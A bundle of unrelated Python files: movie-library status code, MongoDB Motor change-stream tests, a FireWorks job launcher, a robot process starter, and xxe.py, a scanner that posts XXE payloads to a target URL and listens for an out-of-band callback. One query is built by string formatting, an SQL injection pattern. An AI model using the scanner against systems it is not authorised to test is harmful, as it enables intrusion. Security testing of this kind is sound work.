                logging.error('Setting SEARCHRESULTS status of {} to {} failed.'.format(guid.split('&')[0], status))
                return False
            else:
                logging.info('Successfully marked {} as {} in SEARCHRESULTS.'.format(guid.split('&')[0], status))
                return True
        else:
            logging.info('Guid {} not found in SEARCHRESULTS, attempting to create entry.'.format(guid.split('&')[0]))
            if movie_info is None:
                logging.warning('Movie metadata not supplied, unable to create SEARCHRESULTS entry.')
                return False
            # Fabricate a minimal result row for an imported release.
            search_result = searchresults.generate_simulacrum(movie_info)
            search_result['indexer'] = 'Post-Processing Import'
            if not search_result.get('title'):
                search_result['title'] = movie_info['title']
            search_result['size'] = os.path.getsize(movie_info.get('orig_filename') or '.')
            if not search_result['resolution']:
                search_result['resolution'] = 'Unknown'
            search_result = searchresults.score([search_result], imported=True)[0]
            required_keys = ('score', 'size', 'status', 'pubdate', 'title', 'imdbid', 'indexer', 'date_found', 'info_link', 'guid', 'torrentfile', 'resolution', 'type', 'downloadid', 'freeleech')
            search_result = {k: v for k, v in search_result.items() if k in required_keys}
            if core.sql.write('SEARCHRESULTS', search_result):
                return True
            else:
                return False

    @staticmethod
    def markedresults(guid, status, imdbid=None):
        ''' Marks markedresults status
        guid (str): download link guid
        status (str): status to set
        imdbid (str): imdb identification number <optional - default None>

        If guid is in MARKEDRESULTS table, marks it as status.
        If guid not in MARKEDRESULTS table, created entry. Requires imdbid.

        Returns bool
        '''
        TABLE = 'MARKEDRESULTS'
        if core.sql.row_exists(TABLE, guid=guid):
            # Mark bad in MARKEDRESULTS
            logging.info('Marking {} as {} in MARKEDRESULTS.'.format(guid.split('&')[0], status))
            if not core.sql.update(TABLE, 'status', status, 'guid', guid):
                logging.info('Setting MARKEDRESULTS status of {} to {} failed.'.format(guid.split('&')[0], status))
                return False
            else:
                logging.info('Successfully marked {} as {} in MARKEDRESULTS.'.format(guid.split('&')[0], status))
                return True
        else:
            logging.info('Guid {} not found in MARKEDRESULTS, creating entry.'.format(guid.split('&')[0]))
            if imdbid:
                DB_STRING = {}
                DB_STRING['imdbid'] = imdbid
                DB_STRING['guid'] = guid
                DB_STRING['status'] = status
                if core.sql.write(TABLE, DB_STRING):
                    logging.info('Successfully created entry in MARKEDRESULTS for {}.'.format(guid.split('&')[0]))
                    return True
                else:
                    logging.error('Unable to create entry in MARKEDRESULTS for {}.'.format(guid.split('&')[0]))
                    return False
            else:
                logging.warning('Imdbid not supplied or found, unable to add entry to MARKEDRESULTS.')
                return False

    @staticmethod
    def movie_status(imdbid):
        ''' Updates Movie status.
        imdbid (str): imdb identification number (tt123456)

        Updates Movie status based on search results.
        Always sets the status to the highest possible level.

        Returns str new movie status
        '''
        logging.info('Determining appropriate status for movie {}.'.format(imdbid))
        movie = core.sql.get_movie_details('imdbid', imdbid)
        if movie:
            current_status = movie.get('status')
        else:
            return ''
        if current_status == 'Disabled':
            return 'Disabled'
        new_status = None
        # Only consider result types matching the enabled download sources.
        t = []
        if core.CONFIG['Downloader']['Sources']['usenetenabled']:
            t.append('nzb')
        if core.CONFIG['Downloader']['Sources']['torrentenabled']:
            t += ['torrent', 'magnet']
        cmd = 'SELECT DISTINCT status FROM SEARCHRESULTS WHERE imdbid="{}" AND (reject_reason IS NULL OR status <> "{}")' \
              'AND type IN ("import", "{}")'.format(imdbid, 'Available', '", "'.join(t))
        try:
            result_status = [i['status'] for i in core.sql.execute([cmd]).fetchall()] or []
        except Exception:
            logging.warning('Unable to determine movie status.', exc_info=True)
            result_status = []
        # Highest status wins: Finished > Snatched > Found > Wanted/Waiting.
        if 'Finished' in result_status:
            new_status = 'Finished'
        elif 'Snatched' in result_status:
            new_status = 'Snatched'
        elif 'Available' in result_status:
            new_status = 'Found'
        else:
            new_status = 'Wanted' if Manage.verify(movie) else 'Waiting'
        logging.info('Setting MOVIES {} status to {}.'.format(imdbid, new_status))
        if core.sql.update('MOVIES', 'status', new_status, 'imdbid', imdbid):
            return new_status
        else:
            logging.error('Could not set {} to {}'.format(imdbid, new_status))
            return ''

    @staticmethod
    def add_status_to_search_movies(results):
        ''' Annotates TMDB search results with their library status
        results (list): of movie dicts from a TMDB search

        Returns list of the same dicts, with 'status' set for library members
        '''
        tmdb_ids = [x.get('id') for x in results]
        statuses = core.sql.get_movies_status('tmdbid', tmdb_ids)
        for movie_status in statuses:
            for movie in results:
                # search from TMDB return id as int, but we saved as string in tmdbid
                if str(movie['id']) == movie_status['tmdbid']:
                    # we don't care about disabled in search result, show as finished
                    movie['status'] = movie_status['status'] if movie_status['status'] != 'Disabled' else 'Finished'
        return results

    @staticmethod
    def get_stats(category=None):
        ''' Gets stats from database for graphing
        Formats data for use with Morris graphing library

        Returns dict
        '''
        logging.info('Generating library stats.')
        stats = {}
        status = {'Waiting': 0,
                  'Wanted': 0,
                  'Found': 0,
                  'Snatched': 0,
                  'Finished': 0
                  }
        qualities = {'Default': 0}
        for i in core.CONFIG['Quality']['Profiles']:
            if i == 'Default':
                continue
            qualities[i] = 0
        if not category:
            categories = {'Default': 0}
            for i in core.CONFIG['Categories']:
                categories[i] = 0
        years = {}
        added_dates = {}
        scores = {}
        movies = core.sql.get_user_movies(category=category)
        if not movies:
            # FIX: was a set literal {'error', '...'}; docstring promises a dict.
            return {'error': 'Unable to read database'}
        for movie in movies:
            if movie['status'] == 'Disabled':
                status['Finished'] += 1
            else:
                status[movie['status']] += 1
            # Custom (json-encoded) quality profiles are lumped under Default.
            if movie['quality'].startswith('{'):
                qualities['Default'] += 1
            else:
                if movie['quality'] not in qualities:
                    qualities[movie['quality']] = 1
                else:
                    qualities[movie['quality']] += 1
            if not category:
                if movie['category'] not in categories:
                    categories[movie['category']] = 1
                else:
                    categories[movie['category']] += 1
            if movie['year'] not in years:
                years[movie['year']] = 1
            else:
                years[movie['year']] += 1
            # Bucket added dates by month (strip the -DD suffix).
            if movie['added_date'][:-3] not in added_dates:
                added_dates[movie['added_date'][:-3]] = 1
            else:
                added_dates[movie['added_date'][:-3]] += 1
            # Round score to the nearest half point.
            score = round((float(movie['score']) * 2)) / 2
            if score not in scores:
                scores[score] = 1
            else:
                scores[score] += 1
        stats['status'] = [{'label': k, 'value': v} for k, v in status.items()]
        stats['qualities'] = [{'label': k, 'value': v} for k, v in qualities.items()]
        if not category:
            stats['categories'] = [{'label': k, 'value': v} for k, v in categories.items()]
        stats['years'] = sorted([{'year': k, 'value': v} for k, v in years.items()], key=lambda k: k['year'])
        stats['added_dates'] = sorted([{'added_date': k, 'value': v} for k, v in added_dates.items() if v is not None], key=lambda k: k['added_date'])
        stats['scores'] = sorted([{'score': k, 'value': v} for k, v in scores.items()], key=lambda k: k['score'])
        return stats
|
test_motor_change_stream.py | # Copyright 2017-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test MotorChangeStream."""
import copy
import threading
import time
from pymongo.errors import InvalidOperation, OperationFailure
from tornado.testing import gen_test
from test import SkipTest, env
from test.tornado_tests import MotorTest
from test.py35utils import wait_until
from test.utils import get_async_test_timeout
class MotorChangeStreamTest(MotorTest):
    ''' Tests for MotorChangeStream against a live replica set / sharded cluster. '''

    @classmethod
    @env.require_version_min(3, 6)
    def setUpClass(cls):
        super().setUpClass()
        if env.is_standalone:
            # Change streams require a replica set or sharded cluster.
            raise SkipTest("Standalone")
        # Ensure the collection exists.
        env.sync_cx.motor_test.test_collection.delete_many({})
        env.sync_cx.motor_test.test_collection.insert_one({'_id': 1})

    def wait_and_insert(self, change_stream, n=1):
        ''' Insert documents from a background thread once change_stream is live.

        n (int or list): number of empty docs to insert, or explicit doc list
        '''
        # The start time of the change stream is nondeterministic. Wait
        # to ensure this insert comes after the change stream starts.
        def target():
            start = time.time()
            timeout = get_async_test_timeout()
            # Poll until the underlying PyMongo ChangeStream is created.
            while not change_stream.delegate:
                if time.time() - start > timeout:
                    print("MotorChangeStream never created ChangeStream")
                    return
                time.sleep(0.1)
            doclist = [{} for _ in range(n)] if isinstance(n, int) else n
            # Schedule the insert on the event loop (thread-safe entry point).
            self.io_loop.add_callback(self.collection.insert_many, doclist)

        t = threading.Thread(target=target)
        t.daemon = True
        t.start()

    @gen_test
    async def test_async_for(self):
        change_stream = self.collection.watch()
        self.wait_and_insert(change_stream, 2)
        i = 0
        async for _ in change_stream:
            i += 1
            if i == 2:
                break
        self.assertEqual(i, 2)

    @gen_test
    async def test_async_try_next(self):
        change_stream = self.collection.watch()
        # No changes.
        doc = await change_stream.try_next()
        self.assertIsNone(doc)
        # Insert a change and ensure we see it via try_next.
        idoc = {'_id': 1, 'data': 'abc'}
        self.wait_and_insert(change_stream, [idoc])
        while change_stream.alive:
            change_doc = await change_stream.try_next()
            if change_doc is not None:
                break
        self.assertEqual(change_doc['fullDocument'], idoc)

    @env.require_version_min(4, 0, 7)
    @gen_test
    async def test_async_try_next_updates_resume_token(self):
        change_stream = self.collection.watch(
            [{"$match": {"fullDocument.a": 10}}])
        # Get empty change, check non-empty resume token.
        _ = await change_stream.try_next()
        self.assertIsNotNone(change_stream.resume_token)
        # Insert some record that don't match the change stream filter.
        self.wait_and_insert(change_stream, [{'a': 19}, {'a': 20}])
        # Ensure we see a new resume token even though we see no changes.
        initial_resume_token = copy.copy(change_stream.resume_token)

        async def token_change():
            _ = await change_stream.try_next()
            return change_stream.resume_token != initial_resume_token
        await wait_until(token_change, "see a new resume token",
                         timeout=get_async_test_timeout())

    @gen_test
    async def test_watch(self):
        coll = self.collection
        with self.assertRaises(TypeError):
            # pipeline must be a list.
            async for _ in coll.watch(pipeline={}):
                pass
        change_stream = coll.watch()
        future = change_stream.next()
        self.wait_and_insert(change_stream, 1)
        change = await future
        # New change stream with resume token.
        await coll.insert_one({'_id': 23})
        change = await coll.watch(resume_after=change['_id']).next()
        self.assertEqual(change['fullDocument'], {'_id': 23})

    @env.require_version_min(4, 2)
    @gen_test
    async def test_watch_with_start_after(self):
        # Ensure collection exists before starting.
        await self.collection.insert_one({})
        # Create change stream before invalidate event.
        change_stream = self.collection.watch(
            [{'$match': {'operationType': 'invalidate'}}])
        _ = await change_stream.try_next()
        # Generate invalidate event and store corresponding resume token.
        await self.collection.drop()
        _ = await change_stream.next()
        # v5.1 requires an extra getMore after an invalidate event to exhaust
        # the cursor.
        self.assertIsNone(await change_stream.try_next())
        self.assertFalse(change_stream.alive)
        resume_token = change_stream.resume_token
        # Recreate change stream and observe from invalidate event.
        doc = {'_id': 'startAfterTest'}
        await self.collection.insert_one(doc)
        change_stream = self.collection.watch(start_after=resume_token)
        change = await change_stream.next()
        self.assertEqual(doc, change['fullDocument'])

    @gen_test
    async def test_close(self):
        coll = self.collection
        change_stream = coll.watch()
        future = change_stream.next()
        self.wait_and_insert(change_stream, 1)
        await future
        await change_stream.close()
        # A closed stream raises StopAsyncIteration and yields nothing.
        with self.assertRaises(StopAsyncIteration):
            await change_stream.next()
        async for _ in change_stream:
            pass

    @gen_test
    async def test_missing_id(self):
        coll = self.collection
        # Projecting out _id removes the resume token, which the server rejects.
        change_stream = coll.watch([{'$project': {'_id': 0}}])
        future = change_stream.next()
        self.wait_and_insert(change_stream)
        with self.assertRaises((InvalidOperation, OperationFailure)):
            await future
        # The cursor should now be closed.
        with self.assertRaises(StopAsyncIteration):
            await change_stream.next()

    @gen_test
    async def test_unknown_full_document(self):
        coll = self.collection
        # Invalid fullDocument option is rejected server-side on first getMore.
        change_stream = coll.watch(full_document="unknownFullDocOption")
        future = change_stream.next()
        self.wait_and_insert(change_stream, 1)
        with self.assertRaises(OperationFailure):
            await future

    @gen_test
    async def test_async_with(self):
        # 'async with' closes the underlying cursor on exit.
        async with self.collection.watch() as change_stream:
            self.wait_and_insert(change_stream, 1)
            async for _ in change_stream:
                self.assertTrue(change_stream.delegate._cursor.alive)
                break
        self.assertFalse(change_stream.delegate._cursor.alive)

    @gen_test
    async def test_with_statement(self):
        # Synchronous 'with' is not supported; must use 'async with'.
        with self.assertRaises(RuntimeError):
            with self.collection.watch():
                pass

    @env.require_version_min(4, 0)
    @gen_test
    async def test_client(self):
        # Client-level watch observes changes across all databases.
        change_stream = self.cx.watch()
        self.wait_and_insert(change_stream, 2)
        i = 0
        async for _ in change_stream:
            i += 1
            if i == 2:
                break
        await self.cx.other_db.other_collection.insert_one({})
        async for _ in change_stream:
            i += 1
            if i == 3:
                break

    @env.require_version_min(4, 0)
    @gen_test
    async def test_database(self):
        # Database-level watch observes changes across all its collections.
        change_stream = self.db.watch()
        self.wait_and_insert(change_stream, 2)
        i = 0
        async for _ in change_stream:
            i += 1
            if i == 2:
                break
        await self.db.other_collection.insert_one({})
        async for _ in change_stream:
            i += 1
            if i == 3:
                break

    @gen_test
    async def test_watch_with_session(self):
        async with await self.cx.start_session() as session:
            # Pass MotorSession.
            async with self.collection.watch(session=session) as cs:
                self.wait_and_insert(cs, 1)
                _ = await cs.next()
            # Pass PyMongo session directly.
            async with self.collection.watch(session=session.delegate) as cs:
                self.wait_and_insert(cs, 1)
                _ = await cs.next()
|
xxe.py | import socket
import sys
import argparse
import requests
import threading
import time
import hashlib
import os
import sendrequest as req
import utils.logger as logger
import utils.logs as logs
from utils.db import Database_update
# Shared database handle used to record confirmed vulnerabilities.
dbupdate = Database_update()

# Minimal canned HTTP response sent back to a target that connects to our
# listener -- proves the out-of-band XXE callback happened.
data = b'''\
HTTP/1.1 200 OK\r\n\
Connection: close\r\n\
Content-Type: text/html\r\n\
Content-Length: 6\r\n\
\r\n\
Hello!\
'''
class xxe_scan:
    ''' Scans a URL for XML External Entity (XXE) injection.

    Starts a local TCP listener, posts XXE payloads that reference the
    listener's address, and flags the target vulnerable when a payload
    causes the server to connect back with our unique id.
    '''

    def __init__(self):
        # Callback listener address; assumes this host is reachable by the target.
        self.port = 1111
        self.host = socket.gethostbyname(socket.gethostname())

    def generate_hash(self):
        ''' Returns a unique md5 hex digest used as the callback identifier. '''
        # FIX: hashlib.md5 requires bytes in Python 3 -- encode the timestamp.
        return hashlib.md5(str(time.time()).encode()).hexdigest()

    def start_server(self):
        ''' Binds the callback socket. Returns True on success, None on failure. '''
        self.s = socket.socket()
        try:
            self.s.bind((self.host, self.port))
            logs.logging.info("XXE: Server started.")
            return True
        except socket.error:
            logs.logging.info("XXE: Can't bind to port. Port may be busy or check firewall setting.")

    def start_listening(self):
        ''' Accepts callbacks and sets the global `vulnerable` flag when the
        unique id is observed in the incoming request. '''
        global vulnerable
        vulnerable = False
        try:
            while True:
                # Wait for 5 seconds
                self.s.listen(5)
                self.conn, self.addr = self.s.accept()
                self.data = self.conn.recv(1024)
                # FIX: recv() returns bytes in Python 3; compare against the
                # encoded id instead of a str (which raised TypeError).
                if self.data and unique_id.encode() in self.data:
                    # External DTD is enabled. URL is suspicious to XXE.
                    self.conn.sendall(data)
                    vulnerable = True
                self.conn.close()
        except socket.error:
            print ("[-]URL might not be vulnerable to XXE. We reccomend you to check it manually")
            self.conn.close()

    def fetch_xxe_payload(self):
        # Returns xxe payloads in list type
        payload_list = []
        # Payload file location depends on whether we run from the API dir.
        if os.getcwd().split('/')[-1] == 'API':
            path = '../Payloads/xxe.txt'
        else:
            path = 'Payloads/xxe.txt'
        with open(path) as f:
            for line in f:
                if line:
                    payload_list.append(line.rstrip())
        return payload_list

    def send_request(self, url, method, temp_headers, xxe_payloads, scanid=None):
        ''' Posts each payload to url and records a finding if the listener
        marked the target vulnerable. '''
        # Test if the server is accepting XML data at all.
        sample_xml = '''<?xml version="1.0" encoding="UTF-8"?><text>hello world</text>'''
        xml_request = requests.post(url, headers=temp_headers, data=sample_xml)
        if xml_request.status_code == 415:
            # Media type not supported.
            return
        global unique_id
        unique_id = self.generate_hash()
        host = "http://"+str(self.host)+":"+str(self.port)+"/"+unique_id
        for payload in xxe_payloads:
            payload = payload.replace("{host}", host)
            xxe_request = requests.post(url, headers=temp_headers, data=payload)
            # Give the target time to fetch the external entity.
            time.sleep(10)
            if vulnerable is True:
                print ("[+]{0} is vulnerable to XML External Entity Attack".format(url))
                attack_result = { "id" : 14, "scanid" : scanid, "url" : url, "alert": "XML External Entity Attack", "impact": "High", "req_headers": temp_headers, "req_body":payload, "res_headers": xxe_request.headers ,"res_body": xxe_request.text}
                dbupdate.insert_record(attack_result)
                break

    def xxe_test(self, url, method, headers, body, scanid=None):
        ''' Entry point: starts the listener and probes url with XXE payloads. '''
        temp_headers = {}
        temp_headers.update(headers)
        xxe = xxe_scan()
        socketresult = xxe.start_server()
        if socketresult is True:
            t = threading.Thread(target=xxe.start_listening)
            t.daemon = True
            t.start()
            temp_headers['Content-Type'] = 'text/xml'
            xxe_payloads = self.fetch_xxe_payload()
            self.send_request(url, method, temp_headers, xxe_payloads, scanid)
multi_launcher.py | """
This module contains methods for launching several Rockets in a parallel environment
"""
import os
import threading
import time
from multiprocessing import Manager, Process
from fireworks.core.rocket_launcher import rapidfire
from fireworks.fw_config import (
DS_PASSWORD,
PING_TIME_SECS,
RAPIDFIRE_SLEEP_SECS,
FWData,
)
from fireworks.utilities.fw_utilities import (
DataServer,
get_fw_logger,
get_my_host,
log_multi,
)
__author__ = "Xiaohui Qu, Anubhav Jain"
__copyright__ = "Copyright 2013, The Material Project & The Electrolyte Genome Project"
__version__ = "0.1"
__maintainer__ = "Xiaohui Qu"
__email__ = "xqu@lbl.gov"
__date__ = "Aug 19, 2013"
def ping_multilaunch(port, stop_event):
    """
    A single manager to ping all launches during multiprocess launches

    Args:
        port (int): Listening port number of the DataServer
        stop_event (Thread.Event): stop event
    """
    server = DataServer(address=("127.0.0.1", port), authkey=DS_PASSWORD)
    server.connect()
    shared_state = FWData()
    launchpad = server.LaunchPad()
    while not stop_event.is_set():
        for proc_id, launch_id in shared_state.Running_IDs.items():
            if not launch_id:
                continue
            try:
                # Signal 0 is a liveness probe: raises OSError if proc_id is dead.
                os.kill(proc_id, 0)
                launchpad.ping_launch(launch_id)
            except OSError:
                # The launching process died; clear its entry so it is skipped.
                shared_state.Running_IDs[proc_id] = None
        stop_event.wait(PING_TIME_SECS)
def rapidfire_process(
    fworker, nlaunches, sleep, loglvl, port, node_list, sub_nproc, timeout, running_ids_dict, local_redirect
):
    """
    Initializes shared data with multiprocessing parameters and starts a rapidfire.

    Args:
        fworker (FWorker): object
        nlaunches (int): 0 means 'until completion', -1 or "infinite" means to loop forever
        sleep (int): secs to sleep between rapidfire loop iterations
        loglvl (str): level at which to output logs to stdout
        port (int): Listening port number of the shared object manager
        node_list ([str]): computer node list
        sub_nproc (int): number of processors of the sub job
        timeout (int): # of seconds after which to stop the rapidfire process
        running_ids_dict (dict): shared dict recording each sub job's live launch id
        local_redirect (bool): redirect standard input and output to local file
    """
    # Connect to the shared DataServer and publish the multiprocessing
    # parameters through this process's FWData singleton.
    ds = DataServer(address=("127.0.0.1", port), authkey=DS_PASSWORD)
    ds.connect()
    launchpad = ds.LaunchPad()
    FWData().DATASERVER = ds
    FWData().MULTIPROCESSING = True
    FWData().NODE_LIST = node_list
    FWData().SUB_NPROCS = sub_nproc
    FWData().Running_IDs = running_ids_dict
    sleep_time = sleep if sleep else RAPIDFIRE_SLEEP_SECS
    l_dir = launchpad.get_logdir() if launchpad else None
    l_logger = get_fw_logger("rocket.launcher", l_dir=l_dir, stream_level=loglvl)
    rapidfire(
        launchpad,
        fworker=fworker,
        m_dir=None,
        nlaunches=nlaunches,
        max_loops=-1,
        sleep_time=sleep,
        strm_lvl=loglvl,
        timeout=timeout,
        local_redirect=local_redirect,
    )
    # In 'until completion' mode, keep resubmitting as long as any sibling
    # sub job still reports a live launch id in the shared dict.
    while nlaunches == 0:
        time.sleep(1.5)  # wait for LaunchPad to be initialized
        launch_ids = FWData().Running_IDs.values()
        live_ids = list(set(launch_ids) - {None})
        if len(live_ids) > 0:
            # Some other sub jobs are still running
            log_multi(l_logger, f"Sleeping for {sleep_time} secs before resubmit sub job")
            time.sleep(sleep_time)
            log_multi(l_logger, "Resubmit sub job")
            rapidfire(
                launchpad,
                fworker=fworker,
                m_dir=None,
                nlaunches=nlaunches,
                max_loops=-1,
                sleep_time=sleep,
                strm_lvl=loglvl,
                timeout=timeout,
                local_redirect=local_redirect,
            )
        else:
            break
    log_multi(l_logger, "Sub job finished")
def start_rockets(
    fworker,
    nlaunches,
    sleep,
    loglvl,
    port,
    node_lists,
    sub_nproc_list,
    timeout=None,
    running_ids_dict=None,
    local_redirect=False,
):
    """
    Create one rapidfire Process per sub job and start them all.

    Args:
        fworker (FWorker): object
        nlaunches (int): 0 means 'until completion', -1 or "infinite" means to loop forever
        sleep (int): secs to sleep between rapidfire loop iterations
        loglvl (str): level at which to output logs to stdout
        port (int): Listening port number
        node_lists ([str]): computer node list
        sub_nproc_list ([int]): list of the number of the process of sub jobs
        timeout (int): # of seconds after which to stop the rapidfire process
        running_ids_dict (dict): Shared dict between process to record IDs
        local_redirect (bool): redirect standard input and output to local file

    Returns:
        ([multiprocessing.Process]) all the created processes
    """
    processes = []
    for node_list, sub_nproc in zip(node_lists, sub_nproc_list):
        worker_args = (fworker, nlaunches, sleep, loglvl, port, node_list,
                       sub_nproc, timeout, running_ids_dict, local_redirect)
        processes.append(Process(target=rapidfire_process, args=worker_args))
    for proc in processes:
        proc.start()
        # Stagger the starts slightly so the sub jobs don't hammer the
        # DataServer at the same instant.
        time.sleep(0.15)
    return processes
def split_node_lists(num_jobs, total_node_list=None, ppn=24):
    """
    Parse node list and processor list from nodefile contents

    Args:
        num_jobs (int): number of sub jobs
        total_node_list (list of str): the node list of the whole large job
        ppn (int): number of processors per node

    Returns:
        (([int],[int])) the node list and processor list for each job

    Raises:
        ValueError: if the deduplicated node count is not evenly divisible
            by num_jobs
    """
    if total_node_list:
        # Deduplicate and sort for a deterministic, even partition.
        orig_node_list = sorted(set(total_node_list))
        nnodes = len(orig_node_list)
        if nnodes % num_jobs != 0:
            raise ValueError(f"can't allocate nodes, {nnodes} can't be divided by {num_jobs}")
        sub_nnodes = nnodes // num_jobs
        sub_nproc_list = [sub_nnodes * ppn] * num_jobs
        node_lists = [orig_node_list[i : i + sub_nnodes] for i in range(0, nnodes, sub_nnodes)]
    else:
        # No nodefile: each sub job gets one node's worth of processors.
        sub_nproc_list = [ppn] * num_jobs
        node_lists = [None] * num_jobs
    return node_lists, sub_nproc_list
# TODO: why is loglvl a required parameter??? Also nlaunches and sleep_time could have a sensible default??
def launch_multiprocess(
    launchpad,
    fworker,
    loglvl,
    nlaunches,
    num_jobs,
    sleep_time,
    total_node_list=None,
    ppn=1,
    timeout=None,
    exclude_current_node=False,
    local_redirect=False,
):
    """
    Launch the jobs in the job packing mode.

    Starts num_jobs rapidfire sub-processes sharing one DataServer, pings
    their launches from a background thread, and blocks until all sub jobs
    finish.

    Args:
        launchpad (LaunchPad)
        fworker (FWorker)
        loglvl (str): level at which to output logs
        nlaunches (int): 0 means 'until completion', -1 or "infinite" means to loop forever
        num_jobs(int): number of sub jobs
        sleep_time (int): secs to sleep between rapidfire loop iterations
        total_node_list ([str]): contents of NODEFILE (doesn't affect execution)
        ppn (int): processors per node (doesn't affect execution)
        timeout (int): # of seconds after which to stop the rapidfire process
        exclude_current_node: Don't use the script launching node as a compute node
        local_redirect (bool): redirect standard input and output to local file
    """
    # parse node file contents
    if exclude_current_node:
        host = get_my_host()
        l_dir = launchpad.get_logdir() if launchpad else None
        l_logger = get_fw_logger("rocket.launcher", l_dir=l_dir, stream_level=loglvl)
        if host in total_node_list:
            log_multi(l_logger, f'Remove the current node "{host}" from compute node')
            total_node_list.remove(host)
        else:
            log_multi(l_logger, "The current node is not in the node list, keep the node list as is")
    node_lists, sub_nproc_list = split_node_lists(num_jobs, total_node_list, ppn)
    # create shared dataserver
    ds = DataServer.setup(launchpad)
    port = ds.address[1]
    # Manager dict shared by all sub processes to track live launch ids.
    manager = Manager()
    running_ids_dict = manager.dict()
    # launch rapidfire processes
    processes = start_rockets(
        fworker,
        nlaunches,
        sleep_time,
        loglvl,
        port,
        node_lists,
        sub_nproc_list,
        timeout=timeout,
        running_ids_dict=running_ids_dict,
        local_redirect=local_redirect,
    )
    FWData().Running_IDs = running_ids_dict
    # start pinging service
    ping_stop = threading.Event()
    ping_thread = threading.Thread(target=ping_multilaunch, args=(port, ping_stop))
    ping_thread.start()
    # wait for completion, then stop the pinger and tear down the dataserver
    for p in processes:
        p.join()
    ping_stop.set()
    ping_thread.join()
    ds.shutdown()
|
init.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
app_dir = os.path.normpath(os.path.join(os.getcwd(),
os.path.dirname(__file__)))
sys.path.append(os.path.dirname(app_dir))
sys.path.append(os.path.dirname(app_dir) + '/../')
from core.config import settings
from core.config.settings import logger
import subprocess
import signal
def process_exists(process):
    """Return the PID (as a string) of the first running process whose
    command line contains *process*, or False if none matches.

    Scans the output of ``ps -e -o pid,command`` with a plain substring test.
    """
    pid = False
    g = os.popen("ps -e -o pid,command")
    try:
        for line in g.readlines():
            if process in line:
                # First whitespace-delimited token of the stripped line is the PID.
                pid = line.strip().split(' ')[0]
                break
    finally:
        # The pipe was previously leaked; close it so the child is reaped.
        g.close()
    return pid
if __name__ == '__main__':
    # Boot each robot subprocess (jabber, scheduler, output, brain listener,
    # julius) unless an instance is already running, then block on the main
    # process until Ctrl-C, which triggers the teardown in the except block.
    jobs = []
    try:
        if settings.JABBER_ENABLED:
            # start jabber
            jpid = process_exists('jabber/connect.py')
            if not jpid:
                logger.info('Start jabber connector subprocess '
                            + "%s/core/lib/jabber/connect.py"
                            % settings.ROBOT_DIR)
                jabber_proc = subprocess.Popen(
                    ["python", "%s/core/lib/jabber/connect.py"
                     % settings.ROBOT_DIR]
                )
            else:
                logger.info('Jabber connector is already running, skip...')
        ## start sensor fifo output process
        #sensor1_proc = subprocess.Popen(
        #["python" ,
        #"%s/core/device/head/sensor/sound/source_direction.py"
        #% settings.ROBOT_DIR],
        #shell=False,
        #stdin=subprocess.PIPE,
        #stdout=subprocess.PIPE )
        #logger.info("%s", sensor1_proc.communicate())
        #q = Queue()
        #p = Process(target=read_sensor_data, args=(q,))
        #p.start()
        #jobs.append(p)
        #join proceses
        #for p in jobs:
        ##direction = q.get()
        #p.join()
        #logger.info("%s", julius_proc.communicate())
        #else:
        #logger.info('Julius is already running, skip...')
        # Scheduler ("at") subprocess.
        sid = process_exists('core/scheduler/at.py')
        if not sid:
            logger.info("Start scheduler subprocess")
            sched_proc = subprocess.Popen(
                ["python", "%s/core/scheduler/at.py" % settings.ROBOT_DIR]
            )
        else:
            logger.info("Scheduler subprocess already running, skip...")
        # Scheduler connector subprocess.
        scid = process_exists('core/scheduler/connect.py')
        if not scid:
            logger.info("Start scheduler connector subprocess")
            schedc_proc = subprocess.Popen(
                ["python", "%s/core/scheduler/connect.py" % settings.ROBOT_DIR]
            )
        else:
            logger.info("Scheduler connector subprocess already running, skip...")
        # Output subprocess.
        opid = process_exists('core/output.py')
        if not opid:
            logger.info("Start output subprocess")
            brain_proc = subprocess.Popen(
                ["python", "%s/core/output.py" % settings.ROBOT_DIR]
            )
        else:
            logger.info("Output process already running, skip...")
        # Brain listener subprocess.
        # NOTE(review): this reuses the `brain_proc` name and clobbers the
        # output process handle bound just above — confirm if intentional.
        bpid = process_exists('brain/listener.py')
        if not bpid:
            logger.info("Start brain listener subprocess")
            brain_proc = subprocess.Popen(
                ["python", "%s/core/brain/listener.py" % settings.ROBOT_DIR]
            )
        else:
            logger.info("Brain listener subprocess already running, skip...")
        #brain_proc.communicate()
        logger.info("Start main process")
        main_proc = subprocess.Popen(
            ["python", "%s/core/main.py" % settings.ROBOT_DIR]
        )
        if settings.SPEECH_RECOGNITION_ENABLED:
            #start julius
            logger.info('Start julius recognition service.')
            #julius_proc = subprocess.Popen(
            ##["julius", "-quiet", "-input", "mic"
            #, "-C" ,"%s/core/lib/julius/julian.jconf"
            #% settings.ROBOT_DIR , "-module"]
            #["padsp", "julius", "-quiet", "-input",
            #"mic", "-C" ,"%s/core/lib/julius/julian.jconf"
            #% settings.ROBOT_DIR , "-module"]
            #)
            #start julius connector
            jupid = process_exists('julius/connect.py')
            if not jupid:
                logger.info('Start julius connector '
                            + "%s/core/lib/julius/connect.py"
                            % settings.ROBOT_DIR)
                julius_conn_proc = subprocess.Popen(
                    ["python", "%s/core/lib/julius/connect.py"
                     % settings.ROBOT_DIR]
                )
                ##logger.debug("process id: %s"
                #, julius_conn_proc.communicate()[0])
                #julius_conn_proc.communicate()
                #logger.debug("process id: %s"
                #, julius_conn_proc.communicate()[0])
            else:
                logger.info('Julius connector is already running, skip...')
        #ask via jabber first
        apid = subprocess.Popen(
            ["python", "%s/core/brain/ask.py"
             % settings.ROBOT_DIR]
        )
        # run main process
        main_proc.communicate()
    except KeyboardInterrupt:
        # Ctrl-C: signal every known subprocess with SIGHUP.
        # NOTE(review): process_exists returns False when no match is found,
        # and int(False) == 0 — os.kill(0, SIGHUP) would signal this whole
        # process group. Verify each lookup before killing.
        # dpid = process_exists('source_direction')
        # logger.info( 'Stop sound source detector %s ', dpid )
        # os.kill(int(dpid), signal.SIGHUP)
        sid = process_exists('scheduler/at.py')
        logger.info('Terminate scheduller connector process %s ', sid)
        os.kill(int(sid), signal.SIGHUP)
        scid = process_exists('scheduler/connect.py')
        logger.info('Terminate scheduler connector process %s ', scid)
        os.kill(int(scid), signal.SIGHUP)
        jpid = process_exists('jabber/connect.py')
        logger.info('Terminate jabber connector process %s ', jpid)
